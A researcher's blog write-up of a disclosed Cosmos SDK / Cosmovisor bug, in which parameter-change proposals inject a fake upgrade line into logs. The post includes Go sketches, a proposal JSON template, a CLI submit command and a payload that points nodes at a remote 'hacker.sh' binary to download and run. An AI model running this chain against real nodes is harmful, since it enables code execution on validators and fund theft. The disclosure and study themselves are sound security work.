10/11/2023
Imagine you're hunting for bugs in a project. You're reading through the documentation of a widely used framework with millions of dollars at stake. Then, you stumble across this:
Cosmovisor is small process manager for Cosmos SDK application binaries that monitors stdout for incoming chain upgrade proposals. If it sees a proposal that gets approved, cosmovisor can automatically download the new binary, ..., switch from the old binary to the new one, and finally restart the node with the new binary.
Wait, what? It looks like the watchdog program scans through stdout to determine if an update has occurred. If that's true, then this is completely insane! All you would have to do is find a way to write to stdout and the process manager would update your binary. Is this real?
This was the position we were in: a horrible design flaw staring us in the face. While Nathan and I were reviewing the Cosmos SDK, this documentation caught my eye. And there was no going back. Both of us had been here before though. Most of the time, these "obvious" issues turn into sad and unfruitful dead ends. But this time, for once, it was real. Our deep dive into the codebase, and all our time chasing down all those loose ends, had finally paid off. I want you to join us on our journey through the high of discovering, exploiting, and reporting this bug.
For those outside of the blockchain space, this is an interesting application security issue that requires no blockchain-specific knowledge. For those in web3, this is a fascinating wake-up call that not all bugs are in smart contracts; they can be within the infrastructure of the blockchain too. Enjoy! :)
Ethereum allows for the execution of arbitrary code on the blockchain. However, as the first of its kind, it has several drawbacks:
What's the solution to these problems? Create something that is faster, cheaper and allows for customization as well as interoperability between other blockchains. The Cosmos SDK is a blockchain development framework that perfectly meets all of these criteria to make application-specific blockchains. Application-specific blockchains are services made for a specific project, allowing more control over the ecosystem for the developers and users.
For instance, instead of having a trading platform as a smart contract on Ethereum, a project can create its own blockchain that natively runs all the required code for the trading platform. This lets the developer customize various low-level features of the blockchain, such as gas costs, node settings and more. Additionally, the Cosmos SDK has Inter-Blockchain Communication (IBC) as a central feature, which lets developers communicate with other Cosmos blockchains by default to transfer funds or perform other operations.
Cosmos comes with various modules that developers can pick and choose from depending on their needs. Each of these modules provides some sort of additional capability for the blockchain, and their plug-and-play nature makes building the blockchain significantly faster. For instance, there is a bank module for handling ownership over tokens and a governance module for voting on changes to the blockchain.
A node is an individual instance of a blockchain running within the network. Cosmovisor helps manage the node as a watchdog program. It keeps track of the logs, performs upgrades and allows for easy starting and syncing of additional nodes for the blockchain. An image of the node running is shown above in Figure 1.
When an upgrade is required, a user proposes an update via the governance module, which everyone votes on. If the proposal gets enough votes from the other users, then at a specific block (point in time) the blockchain will get updated with this new information. From fine-tuning parameters to changing the code of the chain itself, this is a general purpose method for updating the blockchain in a decentralized fashion.
If a proposal is approved and includes an update to the chain, the governance module will output a string to stdout. The Cosmovisor software will download the new binary, as specified by stdout, and restart itself using this new application. The automatic download and upgrade is awesome for keeping the blockchain up-to-date, but it would be horrifying if a single user could force an upgrade. Remember this for later!
Since Cosmovisor functions as a wrapper or watchdog around the Cosmos blockchain binary, most of the configuration is controlled with environment variables. A few important ones are listed below:
DAEMON_NAME: The name of the blockchain binary that is being executed.
DAEMON_ALLOW_DOWNLOAD_BINARIES: Allow Cosmovisor to download the new application binary and replace the current one. Defaults to false, but many projects have instructions to turn this on.
DAEMON_RESTART_AFTER_UPGRADE: If an upgrade occurs (either manually or via the feature above), restart the application automatically. This defaults to true.
While reading through the code, Nathan found the regex responsible for parsing the upgrade information:
".*": The name of the upgrade itself. Cosmovisor will create a folder for the new upgrade with this name.
(height)(\d+): The block number at which the blockchain should be updated. All systems need to be updated at the same time in order to keep the blockchain running smoothly.
(\S+)):\s+(\S*): Upgrade JSON. This has various fields for determining how to perform the upgrade and looks extremely juicy for potential exploitation. Below are two of the important fields:
The platform the binary targets, such as linux/amd64.
The location to download the new binary from, such as https://maxwelldulin.com/hacker.sh
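To make the parsing concrete, here is a minimal Go sketch of how a log line could be matched and the upgrade JSON read. The full expression is an assumed reconstruction from the pieces listed above (the literal words UPGRADE and NEEDED at are assumptions), and UpgradeInfo, parseUpgradeLine and binaryURL are hypothetical names, not Cosmovisor's own code.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
)

// upgradeRegex is an assumed reconstruction of the pattern whose pieces are
// listed above; the exact expression used by Cosmovisor may differ.
var upgradeRegex = regexp.MustCompile(
	`UPGRADE "(.*)" NEEDED at ((height): (\d+)|(time): (\S+)):\s+(\S*)`)

// UpgradeInfo is a hypothetical container for the captured groups.
type UpgradeInfo struct {
	Name   string // text between the double quotes
	Height string // digits after "height: "; empty for time-based upgrades
	Info   string // raw upgrade JSON, which cannot contain whitespace
}

// parseUpgradeLine returns nil when the line does not announce an upgrade.
func parseUpgradeLine(line string) *UpgradeInfo {
	m := upgradeRegex.FindStringSubmatch(line)
	if m == nil {
		return nil
	}
	return &UpgradeInfo{Name: m[1], Height: m[4], Info: m[7]}
}

// binaryURL looks up the download URL for one platform in the upgrade JSON.
// The {"binaries": {platform: url}} layout is an assumption for illustration.
func binaryURL(info, platform string) (string, error) {
	var parsed struct {
		Binaries map[string]string `json:"binaries"`
	}
	if err := json.Unmarshal([]byte(info), &parsed); err != nil {
		return "", err
	}
	url, ok := parsed.Binaries[platform]
	if !ok {
		return "", fmt.Errorf("no binary listed for %s", platform)
	}
	return url, nil
}

func main() {
	line := `UPGRADE "pwn" NEEDED at height: 100: ` +
		`{"binaries":{"linux/amd64":"https://maxwelldulin.com/hacker.sh"}}`
	if u := parseUpgradeLine(line); u != nil {
		url, err := binaryURL(u.Info, "linux/amd64")
		fmt.Println(u.Name, u.Height, url, err)
	}
}
```

Note that the final group only accepts non-whitespace characters, so any JSON an attacker supplies has to be written without spaces.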
When testing ideas, it's important to "fail fast". I try to find the fastest and laziest way to test out theories, which saves time on bad rabbit holes. If I'm being generous, 1 out of 1000 big ideas works for me. To me, building out a full Cosmos SDK blockchain with Cosmovisor would likely result in time wasted. So, how do we test this fast?
My buddy Zach Minneker taught me to use a project's tests when doing binary fuzzing. Why not use tests here as well? Tests usually have examples of happy paths for getting functionality working. Additionally, projects usually develop wrappers for testing functionality without many external dependencies for setup, allowing for the isolation of specific code. In this case, Cosmovisor has an in-depth set of tests that are easy to run and modify for our own needs. Playing with these was incredibly useful for understanding how the update process functions.
The test suite used files as input for stdout/stderr. We copied an existing test for the upgrade functionality and created a file with our payload. To our surprise, this magically worked! The injected string in the test file triggers the update. This is absolute madness.
The test framework was quite fruitful for our initial testing. From modifying the code and running tests, we were convinced that a bad string would be able to trigger the Cosmovisor update functionality. However, we needed to reproduce this within a real blockchain. This is because there may exist functionality preventing this attack from working that we did not fully understand, or simply didn’t see during our code analysis. So, we looked for a blockchain running a vulnerable version of Cosmovisor, and ended up setting up a Desmos node for testing, mostly because they have great documentation.
Like before, we want to "fail fast". Instead of trying to find a way to print an arbitrary string (aka print sink), we compiled our own print statement into easy-to-hit functionality. We called the added code to trigger the print statement and Cosmovisor saw the update and processed it!
Seeing the call to fmt.Println(...) perform the update was surreal. This is when the idea became reality. Reading the documentation, running the tests and setting up the test environment was 100% worth it! Now, let's find a real print sink to trigger this vulnerability on a real project.
Sometimes, trying to pwn an application requires gaining super esoteric knowledge. Don't be afraid to enter these murky waters when granted strange primitives. Take the time to really understand what you're working with. In the case of Qualys, they could load and unload DLLs and nothing else, yet they were still able to get code execution.
To exploit this, we are going to become experts on how the Cosmos SDK logs data and what it logs. This is a great example of having to learn extremely niche material in order to exploit a vulnerability. To our surprise, this took days upon days of reading code because of unexpected functionality in the Cosmos SDK logging. I will not bore you with the description of how we got there; I'll simply explain how it works below. Just know, this took lots of trial and error to come to.
The Cosmos SDK uses the logger from Tendermint, the consensus and networking layer of Cosmos. The logger utilizes conditional logic for when to output to stdout/stderr depending on the verbosity setting. The node operator specifies the log verbosity of the application binary at startup.
Depending on the type of output the developer of the module wants to give, different functions are called. There are three: Error(), Info() (default visibility) and Debug(). Using these functions and the requested visibility of the logs, the data will be outputted accordingly. The tiered logging setup is common within large projects such as this one.
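As a rough illustration of tiered logging, the Go sketch below filters messages by a minimum level. The Logger type and its level constants are hypothetical stand-ins for this post, not the Tendermint logger API.

```go
package main

import (
	"fmt"
	"strings"
)

// Level orders the three tiers from most to least verbose.
type Level int

const (
	LevelDebug Level = iota
	LevelInfo
	LevelError
)

// Logger is a hypothetical stand-in, not the Tendermint logger.
// It buffers output so the result is easy to inspect.
type Logger struct {
	min Level
	out strings.Builder
}

// emit writes the message only when its level meets the configured minimum.
func (l *Logger) emit(level Level, tag, msg string) {
	if level < l.min {
		return
	}
	fmt.Fprintf(&l.out, "%s %s\n", tag, msg)
}

func (l *Logger) Debug(msg string) { l.emit(LevelDebug, "D", msg) }
func (l *Logger) Info(msg string)  { l.emit(LevelInfo, "I", msg) }
func (l *Logger) Error(msg string) { l.emit(LevelError, "E", msg) }

// Output returns everything that passed the filter so far.
func (l *Logger) Output() string { return l.out.String() }

func main() {
	l := &Logger{min: LevelInfo} // Info as the default visibility
	l.Debug("hidden at the default level")
	l.Info("visible at the default level")
	l.Error("always visible")
	fmt.Print(l.Output())
}
```

The practical consequence for an attacker is that a sink behind Info() or Error() is reachable on a node with default settings, while a Debug() sink only matters if the operator raised the verbosity.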
The logging function requires a single parameter but can accept more. The first parameter is a string that describes the log entry and the data to come. After this, a developer can provide multiple key and value pairs that will be outputted. The output looks like this: LogString key1=value1, key2=value2. An example of this can be seen in Figure 3 for both the code being executed (left) and the log output (right).
The key=value within the string is quote escaped. What does this mean? The logger will turn " into \" whenever we output a double quote to the logs. Does this matter? Immensely! This was a huge setback for us because it breaks the regex parsing mentioned above in Figure 2. The quote escaping was the real reason we got stuck on this attack.
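The effect of the escaping can be shown with a small Go sketch. formatLine is a simplified, hypothetical formatter that quotes every value with strconv.Quote; the real logger's rules are more involved. The regex is the same assumed reconstruction of the Cosmovisor pattern, and the payload is a placeholder.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Assumed reconstruction of the upgrade pattern; the real one may differ.
var upgradeRegex = regexp.MustCompile(
	`UPGRADE "(.*)" NEEDED at ((height): (\d+)|(time): (\S+)):\s+(\S*)`)

// formatLine is a simplified, hypothetical formatter: the message is written
// as-is and every value is quote escaped, turning " into \".
func formatLine(msg string, keyvals ...string) string {
	var b strings.Builder
	b.WriteString(msg)
	for i := 0; i+1 < len(keyvals); i += 2 {
		fmt.Fprintf(&b, " %s=%s", keyvals[i], strconv.Quote(keyvals[i+1]))
	}
	return b.String()
}

// triggersUpgrade reports whether a log line would match the upgrade pattern.
func triggersUpgrade(line string) bool {
	return upgradeRegex.MatchString(line)
}

func main() {
	payload := `UPGRADE "pwn" NEEDED at height: 100: {"binaries":{}}`
	logged := formatLine("param change", "value", payload)
	fmt.Println(logged)
	// The raw payload matches; the escaped key=value form does not.
	fmt.Println(triggersUpgrade(payload), triggersUpgrade(logged))
}
```

Because the pattern needs a literal double quote right after the upgrade keyword, a backslash in front of that quote is enough to stop the match. That is why attacker data placed in a value is harmless here, and why only the unescaped message string is interesting.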
From many hours of reviewing the logger code and dynamic testing, we understood the limitations of the system. So, what can we do? What types of sinks should we look for in the code?
After a week of work, Nathan and I read through the Cosmos SDK four times each and had downloaded various projects using the SDK to see if they had issues. Eventually, we started looking for usages of sprintf() within the beginning parameter of the logger function.
Sometimes, going through the same code with new knowledge allows us to see new issues compared to before. I commonly find bugs on a third or fourth pass through a codebase since code from one place may help me understand code in another location. After a week of searching and at the very end of night seven, we found the param module with this beautiful sink:
The code in Figure 4 is for proposing a new param change within the Cosmos SDK. The parameters provided could be an arbitrary key and an arbitrary value. According to our specifications, the sink was the initial string of the logger and was using %s within a format string for sprintf(), which is not quote escaped. With these specifications, we should be able to put double quotes inside of here and create valid JSON! To make matters better, there is no input validation prior to this within the Cosmos SDK; we can provide literally any string for these, making it the perfect sink.
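The shape of such a sink can be sketched in Go as follows. describeChange and its message wording are illustrative only and are not copied from the SDK; the regex is an assumed reconstruction of the Cosmovisor pattern.

```go
package main

import (
	"fmt"
	"regexp"
)

// Assumed reconstruction of the upgrade pattern; the real one may differ.
var upgradeRegex = regexp.MustCompile(
	`UPGRADE "(.*)" NEEDED at ((height): (\d+)|(time): (\S+)):\s+(\S*)`)

// describeChange mimics the sink: user-controlled strings are formatted into
// the log message itself with %s, so no quote escaping is applied.
// The message wording is illustrative, not the SDK's.
func describeChange(key, value string) string {
	return fmt.Sprintf("setting parameter; key: %s, value: %s", key, value)
}

// upgradeName returns the upgrade name a regex-based watcher would extract
// from the line, or "" when the line does not match.
func upgradeName(line string) string {
	m := upgradeRegex.FindStringSubmatch(line)
	if m == nil {
		return ""
	}
	return m[1]
}

func main() {
	payload := `UPGRADE "pwn" NEEDED at height: 100: ` +
		`{"binaries":{"linux/amd64":"https://maxwelldulin.com/hacker.sh"}}`
	fmt.Printf("%q\n", upgradeName(describeChange("PwnMe", payload)))
	fmt.Printf("%q\n", upgradeName(describeChange("MaxValidators", "100")))
}
```

Since the pattern is not anchored to the start of the line, the attacker-controlled text can sit anywhere inside the message and still be picked up.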
Could this situation get better? Yes! First, the code path (param module) is available in every blockchain using the Cosmos SDK. Second, the code utilizes the .Info() function, which is the default visibility of the logger. Finally, it does not require any crazy setup, circumstances or special authorization. We can call a single function from the Cosmos SDK CLI in order to hit this code. All of this together means that a single call to any Cosmos blockchain could result in code execution or knock the node offline.
All that is required is to make a single call to the Cosmos blockchain via the CLI. Depending on the version of the SDK, param will either be its own module or be under governance. For our own testing, we chose to use Desmos, which uses gov, since we had a working node already installed on the system. NOTE: This is not a flaw in Desmos specifically.
The parameter change proposal is a JSON file when used from the CLI. The sink is within this proposal JSON data. Below is an example of valid JSON, with PAYLOAD HERE as filler for our attack data:
{
  "title": "TitleDK",
  "description": "DescDK",
  "changes": [
    {
      "key": "PwnMe",
      "value": "PAYLOAD HERE",
      "subspace": "bank"
    }
  ],
  "address": "desmos1jtu..."
}
The payload for the value field is below. I removed this from the JSON above because it is really messy. It should be noted that since the string is within the JSON, the payload needs to be quote escaped here (\" instead of ").
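To illustrate the escaping step, here is a minimal Go sketch that builds a proposal file with encoding/json. It is not the original payload: the upgrade name, height and upgrade JSON layout are placeholders, the struct types are hypothetical, and the address is kept truncated exactly as in the example above.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// ParamChange and Proposal are hypothetical types mirroring the JSON above.
type ParamChange struct {
	Key      string `json:"key"`
	Value    string `json:"value"`
	Subspace string `json:"subspace"`
}

type Proposal struct {
	Title       string        `json:"title"`
	Description string        `json:"description"`
	Changes     []ParamChange `json:"changes"`
	Address     string        `json:"address"`
}

// buildProposal places the payload in the value field; json.MarshalIndent
// takes care of turning every " inside the payload into \".
func buildProposal(payload string) (string, error) {
	p := Proposal{
		Title:       "TitleDK",
		Description: "DescDK",
		Changes:     []ParamChange{{Key: "PwnMe", Value: payload, Subspace: "bank"}},
		Address:     "desmos1jtu...", // truncated in the original; left as-is
	}
	raw, err := json.MarshalIndent(p, "", "  ")
	if err != nil {
		return "", err
	}
	return string(raw), nil
}

// decodedValue parses a proposal document and returns the first change value,
// which is what the node sees after JSON decoding.
func decodedValue(doc string) (string, error) {
	var p Proposal
	if err := json.Unmarshal([]byte(doc), &p); err != nil {
		return "", err
	}
	if len(p.Changes) == 0 {
		return "", fmt.Errorf("proposal has no changes")
	}
	return p.Changes[0].Value, nil
}

// hasEscapedQuotes reports whether the document contains a \" sequence.
func hasEscapedQuotes(doc string) bool {
	return strings.Contains(doc, `\"`)
}

func main() {
	// Placeholder payload; the upgrade JSON layout is an assumption.
	payload := `UPGRADE "pwn" NEEDED at height: 100: ` +
		`{"binaries":{"linux/amd64":"https://maxwelldulin.com/hacker.sh"}}`
	doc, err := buildProposal(payload)
	if err != nil {
		panic(err)
	}
	fmt.Println(doc)
}
```

The quotes are escaped only in the file on disk. Once the node decodes the JSON, the value contains plain double quotes again, which is what the regex needs to see.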
How does this sink payload work? Remember the regex from above? Our goal is to match this perfectly within either the key or value proposal field. The fields within the payload, as seen in Figure 5, are shown below:
binaries field. In this case, we were testing on a Linux system but it can be set up on others as well.
value.
Below is the CLI call for sending the proposal to hit the print sink for Desmos. A similar call can be used for other projects though:
$ desmosd tx gov \
    submit-legacy-proposal param-change \
    proposal.json --from test_user
The call is simply executing the parameter change proposal from the CLI. The real magic comes from the proposal.json file crafted above, which contains the string to force our upgrade.
What does this look like for real? Watch the proof of concept below. This goes from executing the command to getting RCE on the box.
If you want to follow along, there is a completely Dockerized proof of concept on my GitHub at mdulin2. This contains a demo environment that will automatically install a Cosmos SDK chain (Cronos, Desmos or Osmosis) and run the node. Then, within the Docker container, there is a bash script with the environment configured that will run the exploit. Feel free to play around with the environment to get a better grasp of what is going on.
When the remote download flag is turned on, this vulnerability results in remote code execution (RCE). A compromised validator could get all of its funds stolen. However, the worst case is that a malicious actor could compromise all nodes in order to force the network to perform malicious actions, such as token transfers to themselves.
If the remote download flag is turned off, the vulnerability acts as a denial of service (DoS) bug. This is because when the update fails, the node does not reboot. Being able to take down a blockchain is catastrophic; it leads to a lack of trust in the system and does not allow actions to be performed by its users. Both of these attacks have horrifying consequences: either compromising nodes or taking the blockchain offline.
Fortunately (or unfortunately), the Cosmovisor documentation quoted at the beginning of the article was in an old version of the README.md. The bug only existed in the v0.1.0 version of the tool. However, it existed in the Cosmos SDK main branch until version 0.46.0, since the updated Cosmovisor was kept in a separate branch for whatever reason. So, who is really vulnerable?
Because of these requirements, we were unsure of just how many potential node operators across the Cosmoverse would be vulnerable to this attack, since it’s impossible to know which version of Cosmovisor is being run locally on a node. But the prevalence of forked, un-upgraded versions of the Cosmos SDK made us realize this was likely a non-trivial issue, and might affect more chains than we initially thought.
One question remained though: how was this already fixed in the newest versions of Cosmovisor? After some digging, we realized we had rediscovered a bug! A developer saw this as a potential issue and rewrote the tool to use files instead of stdout. Good on them for figuring this out! They mentioned this attack was theoretically possible, but there was never any mention of an exploit path in the GitHub issue and no urgency regarding upgrades.
Honestly, we were just trying to understand the Cosmos SDK when we found this bug and another one. Luckily for us, the Cosmos SDK has a bug bounty program.
Unluckily for us, the bug in this blog post was considered out of scope. Recently, they expanded the program to make these classes of vulnerabilities in scope, but it was after I had reported this bug. I wonder if this report had anything to do with that? Anyway, this is an awesome step in the right direction for the Cosmos SDK team. With millions of dollars at stake, it should be the impact on the ecosystem that matters and not some scope document that does not cover every impact imaginable. In the end, they gave us a $1250 bonus for our work, which was super nice of them, especially considering this was a bug in an older version of the Cosmos SDK, and it was unclear exactly what the scope of impact was.
We found another vulnerability within the Cosmos SDK as well. This bug was a simple role-based authorization bug within the circuit module. Read the HackerOne report or the GitHub pull request to get more insight on this. This vulnerability netted us more than the bug in this post: $2K and a $500 bonus for a good report.
Overall, we took home $3.75K for two bugs in the Cosmos SDK. The team was really nice to work with and I'd be happy to report bugs to this program in the future. These were the first two bugs that I had reported via HackerOne and I had a good experience doing it. This also ended up with a disclosure on the Cosmos SDK forums, which was cool to see after all of this work. A screenshot of this is shown in Figure 7 of the disclosure.
From every finding and every project, there is always so much to learn. Whether it's a new thing or an old trick that just was particularly useful this time around, I always try to document a few takeaways.
For me, this was a major confidence boost. Finding a serious RCE/DoS bug and an access control vulnerability is a great start to our journey in the Cosmos world. Bug bounty programs reward those who obtain specialized knowledge and who are willing to go where other people are not.
Thanks for joining me in my understanding of a bug that Nathan Kirkland and I discovered in the Cosmos SDK. I hope you found this interesting and learned from the security discussions. Thanks to Max Arnold and Nathan Kirkland for reviewing the post and the Cosmos SDK team for disclosing and fixing the bugs. Feel free to reach out to me (contact information is in the footer) if you have any questions, comments about this article or anything else. Additionally, if you want an audit of your Cosmos project, feel free to reach out as well. Cheers from Maxwell "ꓘ" Dulin.